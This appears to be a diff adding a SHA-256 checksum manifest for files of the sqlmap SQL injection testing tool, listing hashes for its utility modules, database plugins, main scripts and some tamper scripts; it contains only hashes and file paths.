+1d72a586358c5f6f0b44b48135229742d2e598d40cefbeeabcb40a1c2e0b70b2  lib/utils/brute.py
+dd0b67fc2bdf65a4c22a029b056698672a6409eff9a9e55da6250907e8995728  lib/utils/crawler.py
+41a037169ca0b595781d70d6af40e2b47c9a2732fd08378029502bbe6f522960  lib/utils/deps.py
+0b83cc8657d5bea117c02facde2b1426c8fe35d9372d996c644d67575d8b755f  lib/utils/getch.py
+c2a2fa68d2c575ab35f472d50b8d52dd6fc5e1b4d6c86a06ac06365650fec321  lib/utils/har.py
+e6376fb0c3d001b6be0ef0f23e99a47734cfe3a3d271521dbe6d624d32f19953  lib/utils/hashdb.py
+c746c4dcc976137d6e5eff858146dcf29f01637587d3bdb8e2f8a419fc64b885  lib/utils/hash.py
+c099f7f2bd2a52e00b2bda915475db06dd58082e44e1e53adea20153eb9186a8  lib/utils/httpd.py
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  lib/utils/__init__.py
+45decceb62e02897e4c1e2022442b4d0b9a112f6987b8b65ed4f664411661a69  lib/utils/pivotdumptable.py
+901ba2d06a3d54b4ae38572c8aab7da37da1aa8500ca6433e61b38c5422f5283  lib/utils/progress.py
+bd067905ffda568dea97d3bc4c990ec3da6ec6e97452ccf91e44e71b986a84ff  lib/utils/purge.py
+2fbd992eb06ba27b2aa5b392d3c9176622eb8077bfa119362255d11e05f79189  lib/utils/safe2bin.py
+b0fdaca72e4f72c3716332712f7ad326ac5144035acc9932551a4c0e83b3da4e  lib/utils/search.py
+8258d0f54ad94e6101934971af4e55d5540f217c40ddcc594e2fba837b856d35  lib/utils/sgmllib.py
+fa45c4ce21c22eb62c0af72043333acc0829e03fe493ea541f0d5ef7c897106b  lib/utils/sqlalchemy.py
+bbdd6baaf35af44c54814867cbc39c20a1f439825a5187e1b57a6de403827c5b  lib/utils/timeout.py
+c91f58935cdcc92ddb19d39cbb2682f0c27f7afca03f54bc3339ab79b6ce009f  lib/utils/versioncheck.py
+6db999394de705f14455afd6bcb8d3e002617b3c05ef5f8460016321944322ec  lib/utils/xrange.py
+33049ba7ddaea4a8a83346b3be29d5afce52bbe0b9d8640072d45cadc0e6d4bb  LICENSE
+d370bc084f3a2e0530376535fb8008aae3bf15347265810cc8e9385875ba1f3e  plugins/dbms/access/connector.py
+cb5af76dace2a68873f74116e3c2f2c9d6ec8110a407d42a184fa95a5613794b  plugins/dbms/access/enumeration.py
+4e2696cff684223dffbd0e82526f37cd888d5e37e431c83032cb9b9e7ed79bf7  plugins/dbms/access/filesystem.py
+0aefa72d06a02339a01112dd7dd518feb37c3ec7ced8b2753957457b41c43dda  plugins/dbms/access/fingerprint.py
+86fbc71bdfb1bf45945b6d6d29ce2d88bf7533c815e4bba547c668a548b7b070  plugins/dbms/access/__init__.py
+1214499071805a21fa331a84bdf4d6e62f146d941a0ff7a1d2ec51938c7e3da1  plugins/dbms/access/syntax.py
+64354bc61198a9a20623ca175aea982aec996e0a7d0ac886e4017b58d445478a  plugins/dbms/access/takeover.py
+3b68a22e397eca290a7edbb3d6555b37d59784f178f9f1ec68ab6b12f60604f2  plugins/dbms/altibase/connector.py
+235451aee017177d209c6d86b773118c619d089a9652007a1294b90f824e8454  plugins/dbms/altibase/enumeration.py
+81ac7de755f2069f1998cb0047134cbd68e8c3380207eb2ddf38acbcf694315b  plugins/dbms/altibase/filesystem.py
+987b05c3586db8238251583501a21993994d92136d7f253a3032ae414cadb1c4  plugins/dbms/altibase/fingerprint.py
+c38dfe9b4c5c378ac860b5fd19aeb0c740506ad17644c6c0c079891a39ae7963  plugins/dbms/altibase/__init__.py
+359ad9846e36787bfbb0e1df52655231c48e7b9f05e9bb4458d6449e9278081f  plugins/dbms/altibase/syntax.py
+4ce2958a0328272eb563828449a7a7da2932ebffb73cf8bc36d01bb0bd6c2d9c  plugins/dbms/altibase/takeover.py
+ae2b9e279ba6a6381e6de6bb8c9a1a58139c9a47fd9a6bbeae399ab40494fb3e  plugins/dbms/cache/connector.py
+5b4f71dae72e439bab52b5be12ca865b43ad6974f91a152960f80f12005bce01  plugins/dbms/cache/enumeration.py
+81ac7de755f2069f1998cb0047134cbd68e8c3380207eb2ddf38acbcf694315b  plugins/dbms/cache/filesystem.py
+00cd3fa2b6d8db2d9cae4729cbeea1626171febc3d0fce49d1e9ea3a3d4b322d  plugins/dbms/cache/fingerprint.py
+b50a93b43b1ef8785ed8ecf7725ffb60be70a0e39c5f5aff6275afe6cbae3b74  plugins/dbms/cache/__init__.py
+2d46462e009241d7f645146a1ceb87b3dac922aba3dcf765836d4fa6d4a77062  plugins/dbms/cache/syntax.py
+bd65dade7645aa0531995fb44a34eb9ce241339e13d492fb1f41829c20ee6cf9  plugins/dbms/cache/takeover.py
+b32a001e38d783da18fb26a2736ff83245c046bc4ced2b8eea30a4d3a43c17ff  plugins/dbms/clickhouse/connector.py
+c855b2813bee40f936da927d32c691a593f942ed130a6fcd8bd8ba2dd0b79023  plugins/dbms/clickhouse/enumeration.py
+6a747cc03150e842ef965f0ba7b6e6af09cf402c5fcec352c4c33262a0fb6649  plugins/dbms/clickhouse/filesystem.py
+e159d542bb11c39efddb3d2361e85a6c02c3fcd8379d1e361788b1238cb30d4c  plugins/dbms/clickhouse/fingerprint.py
+3d11998b69329244ca28e2c855022c81a45d93c1f7125c608b296cc6cae52f90  plugins/dbms/clickhouse/__init__.py
+0e10abe53ab22850c0bde5cdbc25bb8762b49acd33e516908a925ca120e99b8d  plugins/dbms/clickhouse/syntax.py
+97aad46616dd7de6baf95cb0a564ffe59677cacf762c21ade3a76fdf593ea144  plugins/dbms/clickhouse/takeover.py
+c9a8ac9fa836cf6914272b24f434509b49294f2cb177d886622e38baa22f2f15  plugins/dbms/cratedb/connector.py
+b72ed76ba5ae2aa243c4521edc6065e9e174abdc1f04d98d6c748ebe7f9089a1  plugins/dbms/cratedb/enumeration.py
+81ac7de755f2069f1998cb0047134cbd68e8c3380207eb2ddf38acbcf694315b  plugins/dbms/cratedb/filesystem.py
+6167e40ba8214b6d2ec0dfce75e09411e42cd00019be6f79d1e4feadbd9ac8e7  plugins/dbms/cratedb/fingerprint.py
+ffdb1bc63b19e83621ba283c3ad1a5cdcbfe8ce531d896c0399a7299ac96dd1e  plugins/dbms/cratedb/__init__.py
+642d47444f93d9b285817e4b6299d66a0524b3c02d9be9d0000afcea4507ca21  plugins/dbms/cratedb/syntax.py
+c9ad859ab80abc53be9a39f8872beaa373e272dbdb91ec364ac90aabb0c33e6c  plugins/dbms/cratedb/takeover.py
+a0fd0084f2b66451a4e5319479e481475d834ab5afee5fab4482ad422c82c05e  plugins/dbms/cubrid/connector.py
+8a8fc2dd8f225ba537b6c29613e50cfe737eea94aeb4c75a26385528dd2bfb94  plugins/dbms/cubrid/enumeration.py
+81ac7de755f2069f1998cb0047134cbd68e8c3380207eb2ddf38acbcf694315b  plugins/dbms/cubrid/filesystem.py
+ff2b84a3cf82d839e5a1b25a59af398310a69197d3e514c01f5dddaf5975bd4e  plugins/dbms/cubrid/fingerprint.py
+75cf7331e3fc9531815d36743e91e791e762532ce8c6e0e7653b337b5c581e4e  plugins/dbms/cubrid/__init__.py
+1cdc563915dd58036b65df6a8c067aaa7176089c42a1b96bafdebe5c156d6d8d  plugins/dbms/cubrid/syntax.py
+98de1c6a28fae8d0f765551dd6d4b22f8982513c75cfef045099b620db778a4b  plugins/dbms/cubrid/takeover.py
+fb55dc97f9850947740a6e54cd39a1d733031eb37d5ff413a087b1e29800dc95  plugins/dbms/db2/connector.py
+c815a27a9a166466f3d0c2c4c9c2d1764505c6a921708c7ee175d9b2fc7cb55f  plugins/dbms/db2/enumeration.py
+81ac7de755f2069f1998cb0047134cbd68e8c3380207eb2ddf38acbcf694315b  plugins/dbms/db2/filesystem.py
+6a460542cf76a8c8edf45456332a2db48b1fdc827540995ec8cd39fc01625219  plugins/dbms/db2/fingerprint.py
+6ab11009b27309848daf190700e3733ee0dc3331fc6de669c79092567617fcc0  plugins/dbms/db2/__init__.py
+359ad9846e36787bfbb0e1df52655231c48e7b9f05e9bb4458d6449e9278081f  plugins/dbms/db2/syntax.py
+0d10b24235d3633b2115843fc073badd6b875db3732bb3912b4059ee060974a8  plugins/dbms/db2/takeover.py
+101b9e06daae74a6af1b267201b33247b0c5d54782151aa6989d86c3e4a20943  plugins/dbms/derby/connector.py
+4cdfc36d2733793da1f50ef8816da0f53afd4d3f95a9f86455452787a5e07428  plugins/dbms/derby/enumeration.py
+81ac7de755f2069f1998cb0047134cbd68e8c3380207eb2ddf38acbcf694315b  plugins/dbms/derby/filesystem.py
+6e284c28fc81872afff3be64e407ac28f9796bfda7d3f395b3b61c750d1c2f0c  plugins/dbms/derby/fingerprint.py
+4bc4d640730ac123d955360950c55219eabad8a8ad4a5c5a0466a9539c83259d  plugins/dbms/derby/__init__.py
+642d47444f93d9b285817e4b6299d66a0524b3c02d9be9d0000afcea4507ca21  plugins/dbms/derby/syntax.py
+90e369887b4a324842c982d9b6f6db1aca56b78b1eafd5cf2e0ff85446b90c12  plugins/dbms/derby/takeover.py
+6d46a4766cd8b94c921d65bab3f9ea686e0aa0399daf61aedfdfd024185ab156  plugins/dbms/extremedb/connector.py
+15d814523b5a983e12cba88619043fb144109660d8ac212199b46c33eaad980b  plugins/dbms/extremedb/enumeration.py
+53da1fef08665e9255585e62cb9f7282832a284054f2bcacd8aafa7b82cd7da7  plugins/dbms/extremedb/filesystem.py
+c714522cb2600df8f130538112875a9d4d5877783464411f50f9b1e3f41e396c  plugins/dbms/extremedb/fingerprint.py
+73a81cdc2b02da674e67bb21c6d93285148d0f1169070f35609bf939e23c8530  plugins/dbms/extremedb/__init__.py
+642d47444f93d9b285817e4b6299d66a0524b3c02d9be9d0000afcea4507ca21  plugins/dbms/extremedb/syntax.py
+d14abf6a89963a097af9db35fbdad0fd5d366a2865de31cf75fc5d82407f10cf  plugins/dbms/extremedb/takeover.py
+155466d1fde52d80f2ecfd37424b58aef76b6503474738ce39b2edce2101ac15  plugins/dbms/firebird/connector.py
+5073015d2919981f685b7fddd78b798a7d65b60ee240f2475b0d0f2b31061a03  plugins/dbms/firebird/enumeration.py
+2201415625a450901c26616d296bb80316aff949fb17a6fdac1a36feb7014ae6  plugins/dbms/firebird/filesystem.py
+975885c08608fe7972d63febb836da15920a0868bd07bb1e406b54536a3ce7d1  plugins/dbms/firebird/fingerprint.py
+823082e811ca16cdfb27de33ab84f4a111cc7e7da4c77dedca211d7036fa5712  plugins/dbms/firebird/__init__.py
+61650ce8668686a37d426fb35dd81e386b004785a954b0e27a9731351ceca27d  plugins/dbms/firebird/syntax.py
+4b17f762682c0b3f6ff7b53d60f110f1f0c2f76a5bf40b10948692fb09d375a7  plugins/dbms/firebird/takeover.py
+12eb7cd449870c79a50356502754a7e4517c816cc4e475d6c2182bd0a418bb5f  plugins/dbms/frontbase/connector.py
+4c33edfa93fce3e93a02852099643280b69aad70792aed2a5394f4ab7e2c266b  plugins/dbms/frontbase/enumeration.py
+f207fbfd2c52ea6ada72326f579b16aaf6fc1fae4c25f4fa2cc545a45f2c2680  plugins/dbms/frontbase/filesystem.py
+edccff1c98ae9a0aa44b6bddafed6800f10a6a2f7501c51f983ca9d491c61d39  plugins/dbms/frontbase/fingerprint.py
+ac17975286d2a01f6841ad05a7ccb2332bd2c672631c70bd7f3423aa8ad1b852  plugins/dbms/frontbase/__init__.py
+642d47444f93d9b285817e4b6299d66a0524b3c02d9be9d0000afcea4507ca21  plugins/dbms/frontbase/syntax.py
+024efc3a5496ef3377d9e2a3a0b22c4c42dea6b1b5c0eff6919434a38c05b4ef  plugins/dbms/frontbase/takeover.py
+e4e5ec5ffc77fb6697da01a0a5469cc3373b287a3e1f4d40efe8295625e8f333  plugins/dbms/h2/connector.py
+5b35fef7466bb0b99c6aa99c18b58e3005372bec99ce809cc068c72f87a950de  plugins/dbms/h2/enumeration.py
+f83219407b5134e9283baa1f1741d965f650cf165dbd0bad991dc1283e947572  plugins/dbms/h2/filesystem.py
+9ff278b87cf61bd301324b357ffb7ca6305f46d903ce5fd821b8d139357c1d14  plugins/dbms/h2/fingerprint.py
+860696c2561a5d4c6d573c50a257e039bff77ffbc5119513d77089096b051fbc  plugins/dbms/h2/__init__.py
+95149998d4aa7751dfcd1653707b1f94503798f4ef719775a0fddd011742b2ba  plugins/dbms/h2/syntax.py
+8934c4fffc67f0080970bf007d0e2f25d6a79482cc2370673833f3cbe1f9f620  plugins/dbms/h2/takeover.py
+42d3fa136a67898c1908a3882baf128d15a48cd2cfe64054fa77038096e5bc0b  plugins/dbms/hsqldb/connector.py
+4c65b248cb0c2477ffaa9f337af698f6abc910907ef04f2b7ddc783dcc085f7a  plugins/dbms/hsqldb/enumeration.py
+d2581e9e2833b4232fcfc720f6d6638ec2254931f0905f0e281a4022d430c0f0  plugins/dbms/hsqldb/filesystem.py
+95ccbaa856cffc900e752a6e85779bf22feebab98035ba62b1ac93ac08da568e  plugins/dbms/hsqldb/fingerprint.py
+d175e63fd1c896a4c02e7e2b48d818108635c3b98a64a6068e1d4c814d2ce8ce  plugins/dbms/hsqldb/__init__.py
+95149998d4aa7751dfcd1653707b1f94503798f4ef719775a0fddd011742b2ba  plugins/dbms/hsqldb/syntax.py
+0aaa588c65e730320ab501b83b489db25f3f6cf20b5917bcdb9e9304df3419cb  plugins/dbms/hsqldb/takeover.py
+be523cf2d55158a62a842b789cfb9e8fe2bdd39e14134d1d48b432281c4eeaa0  plugins/dbms/informix/connector.py
+0fb38a5c9b72e0ebbda1a937a55399235269fd626d832dd0ab39a730f1efcfb5  plugins/dbms/informix/enumeration.py
+81ac7de755f2069f1998cb0047134cbd68e8c3380207eb2ddf38acbcf694315b  plugins/dbms/informix/filesystem.py
+3fa5fd5a4157625cb56e886292bd9c7cc4a3e611ecade94272e97e3acdd4b116  plugins/dbms/informix/fingerprint.py
+8bf3439844dc55e595f50ebfc5848087a1045bfd6856f8f4426206219ec8884f  plugins/dbms/informix/__init__.py
+9ed94a189509038c4defb74f811beefc77f78cd5cbdef5f3454caaf0ef5fa3a0  plugins/dbms/informix/syntax.py
+0d10b24235d3633b2115843fc073badd6b875db3732bb3912b4059ee060974a8  plugins/dbms/informix/takeover.py
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  plugins/dbms/__init__.py
+24c87bcd39870dda3926c977f674999d52bb28cd0ed63ef471950864be56d356  plugins/dbms/maxdb/connector.py
+ab62053bdea3387caba40d1aeba374f0a68eb520ca46b4426ddf0f716505cc53  plugins/dbms/maxdb/enumeration.py
+e7996383ad3ac84c719ee972946db43f6c80e3059ebf4104c6d0ab92eb81312c  plugins/dbms/maxdb/filesystem.py
+aae7ab70aadbb76522d2a41eea4f9f0ad4347496ab1bfb2aa1a417aaddb555d4  plugins/dbms/maxdb/fingerprint.py
+ad3e211209756b07a501f60920237d4b602fa3a91b26cd4d35a9ccaddb20b273  plugins/dbms/maxdb/__init__.py
+642d47444f93d9b285817e4b6299d66a0524b3c02d9be9d0000afcea4507ca21  plugins/dbms/maxdb/syntax.py
+ce921c72dae90cc4c25ef554fe5706019515019f1e288504d7d0a946a6f0a952  plugins/dbms/maxdb/takeover.py
+04cbfc50a0314e02ff8e85ca99df7b81393c62d4bab33eee76e75724f170c4df  plugins/dbms/mckoi/connector.py
+4ff77ceccc88dded0b29603a7768ff82a499b7994241b54458207184c96d6077  plugins/dbms/mckoi/enumeration.py
+625b6ed49e0c47983d805d88ddce07bff12f7aa6297ffd346a746c3a2498517c  plugins/dbms/mckoi/filesystem.py
+8b8f3fce45ecbd31d38235f7f84fe3291c35e25af2495fd4bdc60684000c3ffd  plugins/dbms/mckoi/fingerprint.py
+08fd3c1a784deabc5a0e801757055589fc13c1c45090236c06f82324a01c4972  plugins/dbms/mckoi/__init__.py
+642d47444f93d9b285817e4b6299d66a0524b3c02d9be9d0000afcea4507ca21  plugins/dbms/mckoi/syntax.py
+e03f0d6499492871a1e142e61b4fa0d28a103803e5cdca25d853b81b5c017e0e  plugins/dbms/mckoi/takeover.py
+de7846f5a61b4368d597dcfceeacc9d40b304f3dc39255a6eb9da0064d62ca8e  plugins/dbms/mimersql/connector.py
+725b51b86fb7d71b932fc5c28c9ee057dd009d446bbc4edd2db8871ae4a4e74e  plugins/dbms/mimersql/enumeration.py
+81ac7de755f2069f1998cb0047134cbd68e8c3380207eb2ddf38acbcf694315b  plugins/dbms/mimersql/filesystem.py
+4ef5f0e7906ba5b5fb2f209652f6bab167f1ca535bc106e5379d20a165ee05c0  plugins/dbms/mimersql/fingerprint.py
+dfd109d97a3ce292e7dbd4c4dc3a2251e9a9d9c6bbd40150f8bbcf789daaa3f6  plugins/dbms/mimersql/__init__.py
+01fd77ddad176b128ad6a3eb11f0b482b9aadaae762fd09da341b20a173f50a4  plugins/dbms/mimersql/syntax.py
+761a070d40466844a2ab6fcf423d228661993b72941e332febe6b4f87a378ce3  plugins/dbms/mimersql/takeover.py
+a0d1e26c32b558e30e791b404fc0b140b3d034cd87d2446a346458bcd137744c  plugins/dbms/monetdb/connector.py
+df95ffeab52ddb3bfbe846802d6a97d7ae4bafaade4bdef5c3127c4e24fa611e  plugins/dbms/monetdb/enumeration.py
+81ac7de755f2069f1998cb0047134cbd68e8c3380207eb2ddf38acbcf694315b  plugins/dbms/monetdb/filesystem.py
+33bae74354d238c45395e244076c777b6a90db726aa7740137cb0afc6b305ef3  plugins/dbms/monetdb/fingerprint.py
+6c645258ca81c04ea5943950f50e31ee7c6f9290cc2292d1585ee5c796ca7cc3  plugins/dbms/monetdb/__init__.py
+0e79bceb5f5eeadfb81c8637b33bb9dbc21d36b9d68535b364b9b84504fd9054  plugins/dbms/monetdb/syntax.py
+8ae509f210bba745e9d909d7977c476eb6ea9c44103b1c356ebc19fc8402991e  plugins/dbms/monetdb/takeover.py
+e8e010d1bdc9f12df5bc3b86c0a80a80cce81a820c86a4e030bb66be8180091f  plugins/dbms/mssqlserver/connector.py
+32c1e51893a16b0112c0a43e8de4e57857b3c2c8952233793252ffe5dc2f59b8  plugins/dbms/mssqlserver/enumeration.py
+5a3a4e9021c07bc5f79925686815c012ae411052e868430a0e6b8a108f9bbbef  plugins/dbms/mssqlserver/filesystem.py
+f01e26e641fbfb3c3e7620c9cd87739a9a607fc66c56337ca02cc85479fb5f63  plugins/dbms/mssqlserver/fingerprint.py
+639873fc2bb7152728d8657719593baa0c41cef8f8c829618ca2182d0ffe497e  plugins/dbms/mssqlserver/__init__.py
+955ece67bfd3c8a27e21dca8604fe5768a69db5d57e78bfc55a4793de61e5c3c  plugins/dbms/mssqlserver/syntax.py
+84ade82bf8a6d331536f4aeb3858307cd8fb5e4f60b2add330e8ba4aa93afe22  plugins/dbms/mssqlserver/takeover.py
+36e706114f64097e185372aa97420f5267f7e1ccfc03968beda899cd6e32f226  plugins/dbms/mysql/connector.py
+96126e474f7c4e5581cabccff3e924c4789c8e2dbc74463ab7503ace08a88a3a  plugins/dbms/mysql/enumeration.py
+4c6af0e2202a080aa94be399a3d60cab97551ac42aa2bcc95581782f3cabc0c3  plugins/dbms/mysql/filesystem.py
+b2c69cfa82d1ea7a5278780d20de6d0c4f1dc0158a809355ed2ffb9afbc74b36  plugins/dbms/mysql/fingerprint.py
+34dfa460e65be6f775b1d81906c97515a435f3dbadda57f5a928f7b87cefd97d  plugins/dbms/mysql/__init__.py
+eb59dd2ce04fa676375166549b532e0a5b6cb4c1666b7b2b780446d615aefb07  plugins/dbms/mysql/syntax.py
+05e1586c3a32ee8596adb48bec4588888883727b05a367a48adb6b86abea1188  plugins/dbms/mysql/takeover.py
+057180682be97f3604e9f8e6bd160080a3ae154e45417ad71735c3a398ed4dfd  plugins/dbms/oracle/connector.py
+78e46d8d3635df6320cb6681b15f8cfaa6b5a99d6d2faf4a290a78e0c34b4431  plugins/dbms/oracle/enumeration.py
+742ad0eb5c11920952314caaf85bb8d1e617c68b7ba6564f66bce4a8630219e7  plugins/dbms/oracle/filesystem.py
+14efe3828c8693952bf9d9e2925091a5b4b6862a242b943525c268a3bc4735b9  plugins/dbms/oracle/fingerprint.py
+04653ad487de6927e9fcd29e8c5668da8210a02ad3d4ac89707bd1c38307c9b5  plugins/dbms/oracle/__init__.py
+d5c9bba081766f14d14e2898d1a041f97961bebac3cf3e891f8942b31c28b47e  plugins/dbms/oracle/syntax.py
+4c83f4d043e5492b0b0ec1db677cbc61f450c8bd6f2314ee8cb4555b00bb64a6  plugins/dbms/oracle/takeover.py
+c9a8ac9fa836cf6914272b24f434509b49294f2cb177d886622e38baa22f2f15  plugins/dbms/postgresql/connector.py
+b086d8ff29282c688772f6672c1132c667a1051a000fc4fcd4ab1068203b0acb  plugins/dbms/postgresql/enumeration.py
+bb23135008e1616e0eb35719b5f49d4093cc688ad610766fca7b1d627c811dd8  plugins/dbms/postgresql/filesystem.py
+ba0eae8047e65dcd23d005e0336653967be9ec4a6df35f4997b006b05a57ea8b  plugins/dbms/postgresql/fingerprint.py
+9912b2031d0dfa35e2f6e71ea24cec35f0129e696334b7335cd36eac39abe23a  plugins/dbms/postgresql/__init__.py
+1a5d2c3b9bd8b7c14e0b1e810e964f698335f779f1a8407b71366dc5e0ee963c  plugins/dbms/postgresql/syntax.py
+b9886913baaac83f6b47b060a4785fe75f61db8c8266b4de8ccfaf180938900a  plugins/dbms/postgresql/takeover.py
+aead3665a963d9bccabcb1128c41cb13e9dc762028a586612f2e8aba46c2e6a5  plugins/dbms/presto/connector.py
+e1a93e0bbdc87bdd64ec6cfb68ce9eb276640397bb4147ea57ca64399b24a324  plugins/dbms/presto/enumeration.py
+8a1d28b47a76b281490cb2208b391cb93c1566e3c77728d955f7a198ebc858f6  plugins/dbms/presto/filesystem.py
+5fc454300c6f828889289285e0fc31e56b2cce9b67ae55621f319f700633e20b  plugins/dbms/presto/fingerprint.py
+0344e3df6d25051b2611aa21407019605b4dc18b788b9119fbedb26be7f7673c  plugins/dbms/presto/__init__.py
+359ad9846e36787bfbb0e1df52655231c48e7b9f05e9bb4458d6449e9278081f  plugins/dbms/presto/syntax.py
+fde7db6d782721e9b96cc05889f6cec991e042adf64a3063eb84414ba747ea55  plugins/dbms/presto/takeover.py
+55e8ff3e19953a7a8c5d49c0d0bb2c257bb8f492f8a7a7642394555cd092a694  plugins/dbms/raima/connector.py
+e07cf0278d173bf58759278151ce830ce8ae5f37c4d601e3f1aabb78a683733d  plugins/dbms/raima/enumeration.py
+2c38e416f0cf5cb4f57c333026631110ba13f427645bdebaaa677760350158e8  plugins/dbms/raima/filesystem.py
+77b67ea17ef9d49281458fc4111e400e418556978ebe0eee74058528054c43af  plugins/dbms/raima/fingerprint.py
+87c3c905ed878224e99ef888134c8a26d7b391a91c48bd014cccb8efe8f3cdb9  plugins/dbms/raima/__init__.py
+95149998d4aa7751dfcd1653707b1f94503798f4ef719775a0fddd011742b2ba  plugins/dbms/raima/syntax.py
+c7c0f076ed708d90500da24d62abd26754f39f60c0bf3a8c69cdb15486356545  plugins/dbms/raima/takeover.py
+588a8805a2675d019a56ae9c7693dd460fae026562512e6ed963149854ac02b9  plugins/dbms/sqlite/connector.py
+b55d302bbf0f6741c8da51a642d9450a457d19a548dab7b48dcff157cda5a918  plugins/dbms/sqlite/enumeration.py
+fa5a2d818c69a24d37bd8d765c2e814a9115e3925114c3b1552d0e25d6079797  plugins/dbms/sqlite/filesystem.py
+2e41ca8e45c1509abdd336563dcbaddecbaffcdfb627c862a2d761de8b63dec5  plugins/dbms/sqlite/fingerprint.py
+41be22829026986472b7d2cfc9d555b47b689e78829a35beef3cc735c4e57988  plugins/dbms/sqlite/__init__.py
+8e920c79f14ccea9ac7466b7b13af8b96d0054e8662c12e1f0490846071d8bd5  plugins/dbms/sqlite/syntax.py
+1665f3d4dd15dc046a76e3f63fa162194bb914777ab6f401e61d6bc1d1203f32  plugins/dbms/sqlite/takeover.py
+2fe51138dab93cbfbe1f675b5bc1d548da5722a27a9a7de9488fecd94cf4abab  plugins/dbms/sybase/connector.py
+cac32a72aa93a52665595575cd0cf41e13b4a9dd61d52ac761dd38c389361f64  plugins/dbms/sybase/enumeration.py
+df25d742d6c7993d8e9b4dfa1ec4d553deb1f4d9cea67dc34839d87f83043687  plugins/dbms/sybase/filesystem.py
+a4702c1890efae100bbe9976e911672ebe6eb36be80ab1444ae022583586c21d  plugins/dbms/sybase/fingerprint.py
+4d893f0e09cc9e7051bcf31e59a1bf0f766d46db37c311a23a1f6ddcaefc5bdd  plugins/dbms/sybase/__init__.py
+fd85b4ce154df0038fed672d6184f70b293acd20a151c361a996b4c6b490173b  plugins/dbms/sybase/syntax.py
+b217edf9e2e4c709072c7985dce8b60b81580f1cd500887270e8986c46a7427e  plugins/dbms/sybase/takeover.py
+2b5d7d5225c9e7ec6d7bd5e1a0253183f6c9a83f1278ec84f4de66f2e9a728ff  plugins/dbms/vertica/connector.py
+71114a697c9bbeace3a6acd7a4399542fb002ed80801d88821c7df84c3975697  plugins/dbms/vertica/enumeration.py
+81ac7de755f2069f1998cb0047134cbd68e8c3380207eb2ddf38acbcf694315b  plugins/dbms/vertica/filesystem.py
+d0c04036a1f320a4fb0005b8101bec2dbd057e8a6a28b36a8f0857005aed07c6  plugins/dbms/vertica/fingerprint.py
+f928dd14ee3404cae4ccee5e929653121e71118f3577f3a996b8543e43ae80a4  plugins/dbms/vertica/__init__.py
+0e313506d5da85da783f2299db13f97c1e767b52e79fea15fea6564d331f80bf  plugins/dbms/vertica/syntax.py
+bbf398e06fc36930fd6ff5f92cdcb9480edcb9e255790cb7a5efbfc5b82e8e78  plugins/dbms/vertica/takeover.py
+9691332bd81468af9a77f897f4639828d2f830fbb1da481cec3e194e34338361  plugins/dbms/virtuoso/connector.py
+6a5fbf52552b7d1c2ac06abef75b20f8771c82348eebdc4ea4592c384199bae3  plugins/dbms/virtuoso/enumeration.py
+f5a88335e9ac0565ea371f2333c233c33f7d0f7961924136fd4da05aab6180f3  plugins/dbms/virtuoso/filesystem.py
+df08594bd8b9be6a7c0053f4eed5247cd30ca33d7fc9a1f9ea183d2970d1f1cd  plugins/dbms/virtuoso/fingerprint.py
+66b04e59cb19e2526d6c0df83af5df10f5bb6cae466e33815058324da9b3453b  plugins/dbms/virtuoso/__init__.py
+359ad9846e36787bfbb0e1df52655231c48e7b9f05e9bb4458d6449e9278081f  plugins/dbms/virtuoso/syntax.py
+b8e6f5e064116dfef1692a258d382db6c28adf63fff9790bc1216ac3251e0dea  plugins/dbms/virtuoso/takeover.py
+c4c0af903df68fdb55909299b6ab0efdc09e8c44769cc095264aa62f62ed61ff  plugins/generic/connector.py
+e93b58e292374c4f36a813b41487cab24beaad0409978df62e56a40bf169a0cd  plugins/generic/custom.py
+034a5796fbe9523964374b538f6b02fb7b57eefc43914e8402916edd986b45f7  plugins/generic/databases.py
+a0329946e8c74c253a9aa0b1a58fa8881c6b2e607bb55562e4bd67bb70838bfd  plugins/generic/entries.py
+1fc8551f16b529b5baff9b4a0a286c5183b7ef9cde9fb5f7b64e303260c60d8d  plugins/generic/enumeration.py
+7218a180c246ce29e30a78c8e772a374ceecf3af8b81b7caaf91d221ab1f6d6d  plugins/generic/filesystem.py
+023f5ba1c58fffd533cb0d2b3fbe1b5de2b6bd200b46b7b1adeb4c02f24d1af9  plugins/generic/fingerprint.py
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  plugins/generic/__init__.py
+e55aaf385c5c77963d9aa6ff4aa64a5f23e7c3122b763b02a7c97a6846d8a58f  plugins/generic/misc.py
+9757a07e6665aba8d9ee0456d9bfb446bef54d8578532f496c51e6b1fc6913f0  plugins/generic/search.py
+5a753afa0014176d3724e3070b594a561dc36d186739249067e694670efb1d00  plugins/generic/syntax.py
+8f372843e22df12006cdf68eb6c9715294f9f3a4fbc44a6a3a74da4e7fcdb4a7  plugins/generic/takeover.py
+b3d9d0644197ecb864e899c04ee9c7cd63891ecf2a0d3c333aad563eef735294  plugins/generic/users.py
+1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  plugins/__init__.py
+5a473c60853f54f1a4b14d79b8237f659278fe8a6b42e935ed573bf22b6d5b2c  README.md
+8c4fd81d84598535643cf0ef1b2d350cd92977cb55287e23993b76eaa2215c30  sqlmapapi.py
+168309215af7dd5b0b71070e1770e72f1cbb29a3d8025143fb8aa0b88cd56b62  sqlmapapi.yaml
+6da15963699aa8916118f92c8838013bc02c84e4d7b9f33d971324c2ff348728  sqlmap.conf
+3795c6d03bc341a0e3aef3d7990ea8c272d91a4c307e1498e850594375af39f7  sqlmap.py
+d6788235cd599e05cb65e9c3279a03b1cf769d4aa15c78d226a1d2cf6aa14e86  tamper/0eunion.py
+35ad42cc9fbe66f025d9f6d0b1284a9f00213510e3c39e60a2d8f3e8b6a77e7b  tamper/apostrophemask.py
+71bc240d0153fccb9caa828f05eca4e9d51c2e5510dee9fb8533b70226d29207  tamper/apostrophenullencode.py
+847b5dc53e195f30abaa6e60b9bc9f39e15df7e6c2a99b31a435b69a345c0937  tamper/appendnullbyte.py
+510b050400bf8cf3ed30d29635083dd69692ec0ca20fe9cb9958feb4f89e34fe  tamper/base64encode.py
+c41f1f5fa2fa73b130f9194e89a04b512fe21784cf1a94e3a61680995999b1dd  tamper/between.py
+576aa77cacbe18695038eeab851be217347ed28d1c0505a098e93fcb3db3575b  tamper/binary.py
+805239f02e8f1bbc3374cb02aec3aa6ae37b72716344f201094c9f39ff35e655  tamper/bluecoat.py
+5e52fb35fbd46cd5293c03491913b655eb47ddb7e99c2830e454945eee693a22  tamper/chardoubleencode.py
